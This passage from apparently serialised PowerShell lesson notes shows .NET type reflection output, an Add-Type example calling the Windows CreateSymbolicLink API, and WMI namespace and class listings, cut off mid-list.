{get;}\r\nIsAutoClass Property bool IsAutoClass {get;}\r\nIsAutoLayout Property bool IsAutoLayout {get;}\r\nIsByRef Property bool IsByRef {get;}\r\nIsClass Property bool IsClass {get;}\r\nIsCOMObject Property bool IsCOMObject {get;}\r\nIsConstructedGenericType Property bool IsConstructedGenericType {get;}\r\nIsContextful Property bool IsContextful {get;}\r\nIsEnum Property bool IsEnum {get;}\r\nIsExplicitLayout Property bool IsExplicitLayout {get;}\r\nIsGenericParameter Property bool IsGenericParameter {get;}\r\nIsGenericType Property bool IsGenericType {get;}\r\nIsGenericTypeDefinition Property bool IsGenericTypeDefinition {get;}\r\nIsImport Property bool IsImport {get;}\r\nIsInterface Property bool IsInterface {get;}\r\nIsLayoutSequential Property bool IsLayoutSequential {get;}\r\nIsMarshalByRef Property bool IsMarshalByRef {get;}\r\nIsNested Property bool IsNested {get;}\r\nIsNestedAssembly Property bool IsNestedAssembly {get;}\r\nIsNestedFamANDAssem Property bool IsNestedFamANDAssem {get;}\r\nIsNestedFamily Property bool IsNestedFamily {get;}\r\nIsNestedFamORAssem Property bool IsNestedFamORAssem {get;}\r\nIsNestedPrivate Property bool IsNestedPrivate {get;}\r\nIsNestedPublic Property bool IsNestedPublic {get;}\r\nIsNotPublic Property bool IsNotPublic {get;}\r\nIsPointer Property bool IsPointer {get;}\r\nIsPrimitive Property bool IsPrimitive {get;}\r\nIsPublic Property bool IsPublic {get;}\r\nIsSealed Property bool IsSealed {get;}\r\nIsSecurityCritical Property bool IsSecurityCritical {get;}\r\nIsSecuritySafeCritical Property bool IsSecuritySafeCritical {get;}\r\nIsSecurityTransparent Property bool IsSecurityTransparent {get;}\r\nIsSerializable Property bool IsSerializable {get;}\r\nIsSpecialName Property bool IsSpecialName {get;}\r\nIsUnicodeClass Property bool IsUnicodeClass {get;}\r\nIsValueType Property bool IsValueType {get;}\r\nIsVisible Property bool IsVisible {get;}\r\nMemberType Property System.Reflection.MemberTypes MemberType {get;}\r\nMetadataToken Property int MetadataToken {get;}\r\nModule Property System.Reflection.Module Module {get;}\r\nName Property string Name {get;}\r\nNamespace Property string Namespace {get;}\r\nReflectedType Property type ReflectedType {get;}\r\nStructLayoutAttribute Property System.Runtime.InteropServices.StructLayoutAttribute StructLayoutAttribute {get;}\r\nTypeHandle Property System.RuntimeTypeHandle TypeHandle {get;}\r\nTypeInitializer Property System.Reflection.ConstructorInfo TypeInitializer {get;}\r\nUnderlyingSystemType Property type UnderlyingSystemType {get;}\r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> $obj | Get-Member -Static\r\n\r\n TypeName: SysCommands\r\n\r\nName MemberType Definition\r\n---- ---------- ----------\r\nEquals Method static bool Equals(System.Object objA, System.Object objB)\r\nlookup Method static void lookup(string domainname)\r\nMain Method static void Main()\r\nReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB)\r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n\r\n```PowerShell\r\nPS C:\\Users\\Administrator\\Desktop> $obj.GetMethods() | Where-Object {$_.Name -eq \"netcmd\"}\r\n\r\nName : netcmd\r\nDeclaringType : SysCommands\r\nReflectedType : SysCommands\r\nMemberType : Method\r\nMetadataToken : 100663298\r\nModule : SysCommands.dll\r\nIsSecurityCritical : True\r\nIsSecuritySafeCritical : False\r\nIsSecurityTransparent : False\r\nMethodHandle : System.RuntimeMethodHandle\r\nAttributes : PrivateScope, Public, HideBySig\r\nCallingConvention : Standard, HasThis\r\nReturnType : System.Void\r\nReturnTypeCustomAttributes : Void\r\nReturnParameter : Void\r\nIsGenericMethod : False\r\nIsGenericMethodDefinition : False\r\nContainsGenericParameters : False\r\nMethodImplementationFlags : IL\r\nIsPublic : True\r\nIsPrivate : False\r\nIsFamily : False\r\nIsAssembly : False\r\nIsFamilyAndAssembly : False\r\nIsFamilyOrAssembly : False\r\nIsStatic : False\r\nIsFinal : False\r\nIsVirtual : False\r\nIsHideBySig : True\r\nIsAbstract : False\r\nIsSpecialName : False\r\nIsConstructor : False\r\nCustomAttributes : {}\r\n\r\nPS C:\\Users\\Administrator\\Desktop>\r\n```\r\n" }, { "path": "31-Using-NET-in-Powershell-Part-5.md", "content": "#### 31. Using .NET in Powershell Part 5\n\n###### Add-Type\n\r- Use ```Add-Type``` with ```-MemberDefinition```\n- Making ```Windows API calls```\r - Get Signature (```pinvoke.net``` recommended)\n - Make the ```method declarations public```\n - Use the modified signature in ```Add-Type -MemberDefinition```\n\n- [Creating a Symbolic Link using PowerShell](https://learn-powershell.net/2013/07/16/creating-a-symbolic-link-using-powershell/)\n- [CreateSymbolicLink](http://pinvoke.net/default.aspx/kernel32/CreateSymbolicLink.html)\n\n- ```New-SymLink.ps1```\n\n```PowerShell\n$ApiCode = @\"\r\n\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern bool CreateSymbolicLink(string lpSymlinkFileName, string lpTargetFileName, int dwFlags);\r\n\r\n\"@\r\n\r\n$SymLink = Add-Type -MemberDefinition $ApiCode -Name Symlink -Namespace CreatSymLink -PassThru\r\n$SymLink::CreateSymbolicLink('C:\\test\\link', 'C:\\Users\\', 1)\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> .\\New-SymLink.ps1\nTrue\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n![Image of API](images/7.jpeg)" }, { "path": "32-Using-WMI-in-Powershell-Part-1.md", "content": "#### 32. Using WMI in Powershell Part 1\n\n###### [WMI](http://searchwindowsserver.techtarget.com/definition/Windows-Management-Instrumentation) – Exploring\n\n- Get help on ```WMI```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Help *wmi*\n\nName Category Module Synopsis\n---- -------- ------ --------\ngwmi Alias Get-WmiObject\niwmi Alias Invoke-WmiMethod\nrwmi Alias Remove-WmiObject\nswmi Alias Set-WmiInstance\nGet-WmiObject Cmdlet Microsoft.PowerShell.M... Gets instances of Windows Management Instrumentation (WMI) classes or information about the available classes.\nInvoke-WmiMethod Cmdlet Microsoft.PowerShell.M... Calls Windows Management Instrumentation (WMI) methods.\nRegister-WmiEvent Cmdlet Microsoft.PowerShell.M... Subscribes to a Windows Management Instrumentation (WMI) event.\nRemove-WmiObject Cmdlet Microsoft.PowerShell.M... Deletes an instance of an existing Windows Management Instrumentation (WMI) class.\nSet-WmiInstance Cmdlet Microsoft.PowerShell.M... Creates or updates an instance of an existing Windows Management Instrumentation (WMI) class.\nabout_WMI HelpFile Windows Management Instrumentation (WMI) uses the\nabout_Wmi_Cmdlets HelpFile Provides background information about Windows Management Instrumentation\n\nPS C:\\Users\\Administrator>\n```\n\n- Exploring ```namespaces``` \n - ```Namespaces``` are collection of ```classes``` which hold ```objects``` of different types\n - [List even the nested namespaces](http://www.powershellmagazine.com/2013/10/18/pstip-list-all-wmi-namespaces-on-a-system/)\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Namespace \"root\" -Class \"__Namespace\" | Select-Object Name\n\nName\n----\nsubscription\nDEFAULT\nMicrosoftDfs\nCIMV2\nmsdtc\nCli\nnap\nMicrosoftActiveDirectory\nSECURITY\nRSOP\nMicrosoftDNS\nStandardCimv2\nWMI\nAccessLogging\ndirectory\nPolicy\nInventoryLogging\nInterop\nHardware\nServiceModel\nMicrosoft\n\nPS C:\\Users\\Administrator>\n```\n\n- Exploring ```classes``` \n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Namespace \"root/cimv2\" -List\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\nCIM_Indication {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...}\nCIM_ClassIndication {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...}\nCIM_ClassDeletion {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...}\nCIM_ClassCreation {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...}\nCIM_ClassModification {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...}\nCIM_InstIndication {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...}\nCIM_InstCreation {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...}\nCIM_InstModification {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...}\nCIM_InstDeletion {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...}\n__NotifyStatus {} {StatusCode}\n__ExtendedStatus {} {Description, Operation, ParameterInfo, ProviderName...}\nWin32_PrivilegesStatus {} {Description, Operation, ParameterInfo, PrivilegesNotHeld...}\nWin32_JobObjectStatus {} {AdditionalDescription, Description, Operation, ParameterInfo...}\nCIM_Error {} {CIMStatusCode, CIMStatusCodeDescription, ErrorSource, ErrorSourceFormat...}\nMSFT_WmiError {} {CIMStatusCode, CIMStatusCodeDescription, error_Category, error_Code...}\nMSFT_ExtendedStatus {} {CIMStatusCode, CIMStatusCodeDescription, error_Category, error_Code...}\n__SecurityRelatedClass {} {}\n__Trustee {} {Domain, Name, SID, SidLength...}\nWin32_Trustee {} {Domain, Name, SID, SidLength...}\n__NTLMUser9X {} {Authority, Flags, Mask, Name...}\n__ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...}\nWin32_ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...}\n__SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...}\nWin32_SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...}\n__PARAMETERS {} {}\n__SystemClass {} {}\n__ProviderRegistration {} {provider}\n__EventProviderRegistration {} {EventQueryList, provider}\n__ObjectProviderRegistration {} {InteractionType, provider, QuerySupportLevels, SupportsBatching...}\n__ClassProviderRegistration {} {CacheRefreshInterval, InteractionType, PerUserSchema, provider...}\n__InstanceProviderRegistration {} {InteractionType, provider, QuerySupportLevels, SupportsBatching...}\n__MethodProviderRegistration {} {provider}\n__PropertyProviderRegistration {} {provider, SupportsGet, SupportsPut}\n__EventConsumerProviderRegistration {} {ConsumerClassNames, provider}\n__thisNAMESPACE {} {SECURITY_DESCRIPTOR}\n__NAMESPACE {} {Name}\n__IndicationRelated {} {}\n__FilterToConsumerBinding {} {Consumer, CreatorSID, DeliverSynchronously, DeliveryQoS...}\n__EventConsumer {} {CreatorSID, MachineName, MaximumQueueSize}\n__AggregateEvent {} {NumberOfEvents, Representative}\n__TimerNextFiring {} {NextEvent64BitTime, TimerId}\n__EventFilter {} {CreatorSID, EventAccess, EventNamespace, Name...}\n__Event {} {SECURITY_DESCRIPTOR, TIME_CREATED}\n__NamespaceOperationEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED}\n__NamespaceModificationEvent {} {PreviousNamespace, SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED}\n__NamespaceDeletionEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED}\n__NamespaceCreationEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED}\n__ClassOperationEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED}\n__ClassDeletionEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED}\n__ClassModificationEvent {} {PreviousClass, SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED}\n__ClassCreationEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED}\n__InstanceOperationEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED}\n__InstanceCreationEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED}\n__MethodInvocationEvent {} {Method, Parameters, PreCall, SECURITY_DESCRIPTOR...}\n__InstanceModificationEvent {} {PreviousInstance, SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED}\n__InstanceDeletionEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED}\n__TimerEvent {} {NumFirings, SECURITY_DESCRIPTOR, TIME_CREATED, TimerId}\n__ExtrinsicEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\n__SystemEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\n__EventDroppedEvent {} {Event, IntendedConsumer, SECURITY_DESCRIPTOR, TIME_CREATED}\n__EventQueueOverflowEvent {} {CurrentQueueSize, Event, IntendedConsumer, SECURITY_DESCRIPTOR...}\n__QOSFailureEvent {} {ErrorCode, ErrorDescription, Event, IntendedConsumer...}\n__ConsumerFailureEvent {} {ErrorCode, ErrorDescription, ErrorObject, Event...}\nMSFT_SCMEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_SCMEventLogEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetSevereServiceFailed {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetTransactInvalid {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetServiceNotInteractive {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetTakeOwnership {} {RegistryKey, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetServiceConfigBackoutFailed {} {ConfigField, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceShutdownFailed {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceStartHung {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceStopControlSuccess {} {Comment, Control, Reason, ReasonText...}\nMSFT_NetServiceSlowStartup {} {SECURITY_DESCRIPTOR, Service, StartupTime, TIME_CREATED}\nMSFT_NetCallToFunctionFailed {} {Error, FunctionName, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetBadAccount {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetBadServiceState {} {SECURITY_DESCRIPTOR, Service, State, TIME_CREATED}\nMSFT_NetConnectionTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetCircularDependencyAuto {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetServiceStartTypeChanged {} {NewStartType, OldStartType, SECURITY_DESCRIPTOR, Service...}\nMSFT_NetServiceLogonTypeNotGranted {} {Account, Error, SECURITY_DESCRIPTOR, Service...}\nMSFT_NetServiceStartFailedGroup {} {Group, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetDependOnLaterService {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetFirstLogonFailedII {} {Account, Error, SECURITY_DESCRIPTOR, Service...}\nMSFT_NetServiceDifferentPIDConne... {} {ActualPID, ExpectedPID, SECURITY_DESCRIPTOR, Service...}\nMSFT_NetServiceCrashNoAction {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED, TimesFailed}\nMSFT_NetCircularDependencyDemand {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceExitFailed {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceStartFailedII {} {DependedOnService, Error, SECURITY_DESCRIPTOR, Service...}\nMSFT_NetServiceExitFailedSpecific {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetBootSystemDriversFailed {} {DriverList, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetServiceCrash {} {Action, ActionDelay, ActionType, SECURITY_DESCRIPTOR...}\nMSFT_NetServiceRecoveryFailed {} {Action, ActionType, Error, SECURITY_DESCRIPTOR...}\nMSFT_NetServiceStatusSuccess {} {Control, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetTransactTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetFirstLogonFailed {} {Error, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetServiceControlSuccess {} {Control, SECURITY_DESCRIPTOR, Service, sid...}\nMSFT_NetServiceStartFailed {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetServiceStartFailedNone {} {NonExistingService, SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_NetReadfileTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetRevertedToLastKnownGood {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NetCallToFunctionFailedII {} {Argument, Error, FunctionName, SECURITY_DESCRIPTOR...}\nMSFT_NetDependOnLaterGroup {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED}\nMSFT_WmiSelfEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_WmiEssEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_WmiThreadPoolEvent {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED}\nMSFT_WmiThreadPoolThreadCreated {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED}\nMSFT_WmiThreadPoolThreadDeleted {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED}\nMSFT_WmiRegisterNotificationSink {} {Namespace, Query, QueryLanguage, SECURITY_DESCRIPTOR...}\nMSFT_WmiFilterEvent {} {Name, Namespace, Query, QueryLanguage...}\nMSFT_WmiFilterDeactivated {} {Name, Namespace, Query, QueryLanguage...}\nMSFT_WmiFilterActivated {} {Name, Namespace, Query, QueryLanguage...}\nMSFT_WmiCancelNotificationSink {} {Namespace, Query, QueryLanguage, SECURITY_DESCRIPTOR...}\nMSFT_WmiProviderEvent {} {Namespace, ProviderName, SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_WmiConsumerProviderEvent {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...}\nMSFT_WmiConsumerProviderSinkLoaded {} {Consumer, Machine, Namespace, ProviderName...}\nMSFT_WmiConsumerProviderSinkUnlo... {} {Consumer, Machine, Namespace, ProviderName...}\nMSFT_WmiConsumerProviderUnloaded {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...}\nMSFT_WmiConsumerProviderLoaded {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...}\nMsft_WmiProvider_OperationEvent {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_ComServerLoadOp... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...}\nMsft_WmiProvider_OperationEvent_... {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_PutInstanceAsyn... {} {Flags, HostingGroup, HostingSpecification, InstanceObject...}\nMsft_WmiProvider_CreateInstanceE... {} {ClassName, Flags, HostingGroup, HostingSpecification...}\nMsft_WmiProvider_DeleteInstanceA... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_CancelQuery_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_NewQuery_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_ProvideEvents_Post {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_ExecQueryAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_AccessCheck_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_CreateClassEnum... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_DeleteClassAsyn... {} {ClassName, Flags, HostingGroup, HostingSpecification...}\nMsft_WmiProvider_ExecMethodAsync... {} {Flags, HostingGroup, HostingSpecification, InputParameters...}\nMsft_WmiProvider_GetObjectAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_PutClassAsyncEv... {} {ClassObject, Flags, HostingGroup, HostingSpecification...}\nMsft_WmiProvider_InitializationO... {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_InitializationO... {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_LoadOperationFa... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...}\nMsft_WmiProvider_ComServerLoadOp... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...}\nMsft_WmiProvider_UnLoadOperation... {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_LoadOperationEvent {} {Clsid, HostingGroup, HostingSpecification, InProcServer...}\nMsft_WmiProvider_OperationEvent_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_DeleteInstanceA... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_AccessCheck_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_ExecQueryAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_DeleteClassAsyn... {} {ClassName, Flags, HostingGroup, HostingSpecification...}\nMsft_WmiProvider_NewQuery_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_PutInstanceAsyn... {} {Flags, HostingGroup, HostingSpecification, InstanceObject...}\nMsft_WmiProvider_CreateClassEnum... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_ExecMethodAsync... {} {Flags, HostingGroup, HostingSpecification, InputParameters...}\nMsft_WmiProvider_ProvideEvents_Pre {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_CancelQuery_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...}\nMsft_WmiProvider_PutClassAsyncEv... {} {ClassObject, Flags, HostingGroup, HostingSpecification...}\nMsft_WmiProvider_GetObjectAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...}\nMsft_WmiProvider_CreateInstanceE... {} {ClassName, Flags, HostingGroup, HostingSpecification...}\nMSFT_WMI_GenericNonCOMEvent {} {ProcessId, PropertyNames, PropertyValues, ProviderName...}\nWin32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type}\nWin32_IP4RouteTableEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nMSFT_NCProvEvent {} {Namespace, ProviderName, Result, SECURITY_DESCRIPTOR...}\nMSFT_NCProvCancelQuery {} {ID, Namespace, ProviderName, Result...}\nMSFT_NCProvClientConnected {} {Inproc, Namespace, ProviderName, Result...}\nMSFT_NCProvNewQuery {} {ID, Namespace, ProviderName, Query...}\nMSFT_NCProvAccessCheck {} {Namespace, ProviderName, Query, QueryLanguage...}\nRegistryEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nRegistryKeyChangeEvent {} {Hive, KeyPath, SECURITY_DESCRIPTOR, TIME_CREATED}\nRegistryTreeChangeEvent {} {Hive, RootPath, SECURITY_DESCRIPTOR, TIME_CREATED}\nRegistryValueChangeEvent {} {Hive, KeyPath, SECURITY_DESCRIPTOR, TIME_CREATED...}\nWin32_SystemTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...}\nWin32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...}\nWin32_ModuleTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_ModuleLoadTrace {} {DefaultBase, FileName, ImageBase, ImageChecksum...}\nWin32_ThreadTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED}\nWin32_ThreadStartTrace {} {ProcessID, SECURITY_DESCRIPTOR, StackBase, StackLimit...}\nWin32_ThreadStopTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED}\nWin32_PowerManagementEvent {} {EventType, OEMEventCode, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_DeviceChangeEvent {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_SystemConfigurationChangeE... {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\nWin32_VolumeChangeEvent {} {DriveName, EventType, SECURITY_DESCRIPTOR, TIME_CREATED}\n__EventGenerator {} {}\n__TimerInstruction {} {SkipIfPassed, TimerId}\n__AbsoluteTimerInstruction {} {EventDateTime, SkipIfPassed, TimerId}\n__IntervalTimerInstruction {} {IntervalBetweenEvents, SkipIfPassed, TimerId}\n__Provider {} {Name}\n__Win32Provider {} {ClientLoadableCLSID, CLSID, Concurrency, DefaultMachineName...}\n__SystemSecurity {GetSD, GetSecuri... {}\nWin32_CollectionStatistics {} {Collection, Stats}\nWin32_NamedJobObjectStatistics {} {Collection, Stats}\nWin32_NTLogEvent {} {Category, CategoryString, ComputerName, Data...}\nCIM_Configuration {} {Caption, Description, Name}\nCIM_LogicalIdentity {} {SameElement, SystemElement}\nWin32_ActiveRoute {} {SameElement, SystemElement}\nWin32_AccountSID {} {Element, Setting}\nCIM_Location {} {Address, Name, PhysicalPosition}\nCIM_DependencyContext {} {Context, Dependency}\nWin32_SecurityDescriptorHelper {Win32SDToSDDL, W... {}\nCIM_Setting {} {Caption, Description, SettingID}\nWin32_TimeZone {} {Bias, Caption, DaylightBias, DaylightDay...}\nWin32_PageFileSetting {} {Caption, Description, InitialSize, MaximumSize...}\nWin32_Desktop {} {BorderWidth, Caption, CoolSwitch, CursorBlinkRate...}\nWin32_ShadowContext {} {Caption, ClientAccessible, Description, Differential...}\nWin32_MSIResource {} {Caption, Description, SettingID}\nWin32_ServiceControl {} {Arguments, Caption, Description, Event...}\nWin32_Property {} {Caption, Description, ProductCode, Property...}\nWin32_Patch {} {Attributes, Caption, Description, File...}\nWin32_PatchPackage {} {Caption, Description, PatchID, ProductCode...}\nWin32_Binary {} {Caption, Data, Description, Name...}\nWin32_AutochkSetting {} {Caption, Description, SettingID, UserInputDelay}\nWin32_SerialPortConfiguration {} {AbortReadWriteOnError, BaudRate, BinaryModeEnabled, BitsPerByte...}\nCIM_MonitorResolution {} {Caption, Description, HorizontalResolution, MaxRefreshRate...}\nWin32_StartupCommand {} {Caption, Command, Description, Location...}\nWin32_BootConfiguration {} {BootDirectory, Caption, ConfigurationPath, Description...}\nWin32_NetworkLoginProfile {} {AccountExpires, AuthorizationFlags, BadPasswordCount, Caption...}\nWin32_NamedJobObjectLimitSetting {} {ActiveProcessLimit, Affinity, Caption, Description...}\nCIM_VideoControllerResolution {} {Caption, Description, HorizontalResolution, MaxRefreshRate...}\nWin32_NamedJobObjectSecLimitSetting {} {Caption, Description, PrivilegesToDelete, RestrictedSIDs...}\nWin32_DisplayConfiguration {} {BitsPerPel, Caption, Description, DeviceName...}\nWin32_NetworkAdapterConfiguration {EnableDHCP, Rene... {ArpAlwaysSourceRoute, ArpUseEtherSNAP, Caption, DatabasePath...}\nWin32_QuotaSetting {} {Caption, DefaultLimit, DefaultWarningLimit, Description...}\nWin32_SecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, SettingID}\nWin32_LogicalFileSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, OwnerPermissions...}\nWin32_LogicalShareSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, Name...}\nWin32_DisplayControllerConfigura... {} {BitsPerPixel, Caption, ColorPlanes, Description...}\nWin32_WMISetting {} {ASPScriptDefaultNamespace, ASPScriptEnabled, AutorecoverMofs, AutoStartWin9X...}\nWin32_OSRecoveryConfiguration {} {AutoReboot, Caption, DebugFilePath, DebugInfoType...}\nWin32_COMSetting {} {Caption, Description, SettingID}\nWin32_ClassicCOMClassSetting {} {AppID, AutoConvertToClsid, AutoTreatAsClsid, Caption...}\nWin32_DCOMApplicationSetting {GetLaunchSecurit... {AppID, AuthenticationLevel, Caption, CustomSurrogate...}\nWin32_VideoConfiguration {} {ActualColorResolution, AdapterChipType, AdapterCompatibility, AdapterDACType...}\nWin32_ODBCAttribute {} {Attribute, Caption, Description, Driver...}\nWin32_ODBCSourceAttribute {} {Attribute, Caption, DataSource, Description...}\nScriptingStandardConsumerSetting {} {Caption, Description, MaximumScripts, SettingID...}\nWin32_PrinterConfiguration {} {BitsPerPel, Caption, Collate, Color...}\nWin32_CurrentTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nWin32_UTCTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nWin32_LocalTime {} {Day, DayOfWeek, Hour, Milliseconds...}\nCIM_FRU {} {Caption, Description, FRUNumber, IdentifyingNumber...}\nCIM_Action {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ShortcutAction {Invoke} {ActionID, Arguments, Caption, Description...}\nCIM_RebootAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ExtensionInfoAction {Invoke} {ActionID, Argument, Caption, Command...}\nCIM_DirectoryAction {Invoke} {ActionID, Caption, Description, Direction...}\nCIM_CreateDirectoryAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_CreateFolderAction {Invoke} {ActionID, Caption, Description, Direction...}\nCIM_RemoveDirectoryAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_RegistryAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ClassInfoAction {Invoke} {ActionID, AppID, Argument, Caption...}\nCIM_ModifySettingAction {Invoke} {ActionID, ActionType, Caption, Description...}\nWin32_SelfRegModuleAction {Invoke} {ActionID, Caption, Cost, Description...}\nWin32_TypeLibraryAction {Invoke} {ActionID, Caption, Cost, Description...}\nCIM_ExecuteProgram {Invoke} {ActionID, Caption, CommandLine, 